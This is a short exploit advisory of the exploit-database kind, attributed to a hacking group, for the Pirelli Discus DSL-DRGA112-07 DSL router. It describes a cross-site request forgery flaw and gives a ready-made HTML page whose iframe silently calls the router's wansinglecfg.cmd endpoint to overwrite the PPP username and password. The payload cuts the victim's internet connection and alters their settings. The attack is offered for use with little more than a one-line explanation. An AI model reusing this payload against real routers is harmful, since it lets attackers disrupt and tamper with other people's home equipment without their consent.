# Exploit Title: Pirelli Discus DSL-DRGA112-07 Remote Change Password # Date: 17/02/2012 # Author: Daniel Godoy # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com # Author Web: www.delincuentedigital.com.ar # Hardware: Pirelli Discus DSL-DRGA112-07 DSL-DRGA112-07 # Tested on: Linux [Comment] Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt, Maximiliano Soler Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0, InyeXion, ksha, zerial,LinuxFer, Scorp her0, r0dr1 y demas user de RemoteExecution www.remoteexecution.info www.remoteexcution.comar #RemoteExecution Hacking Group [PoC] failure may be exploited if the attacker makes his victim enter the following URL: http://10.0.0.2/wansinglecfg.cmd?action=modify&UsernamePPP = [number] & PasswordPPP = [password] automatically be reset his connection with new data and therefore will not have internet connection and your data will be modified. [Exploit] <html> <head> </head> <body> <iframe src="http://10.0.0.2/wansinglecfg.cmd?action=modify&UsernamePPP=[number]&PasswordPPP=[password]"> </body> </html>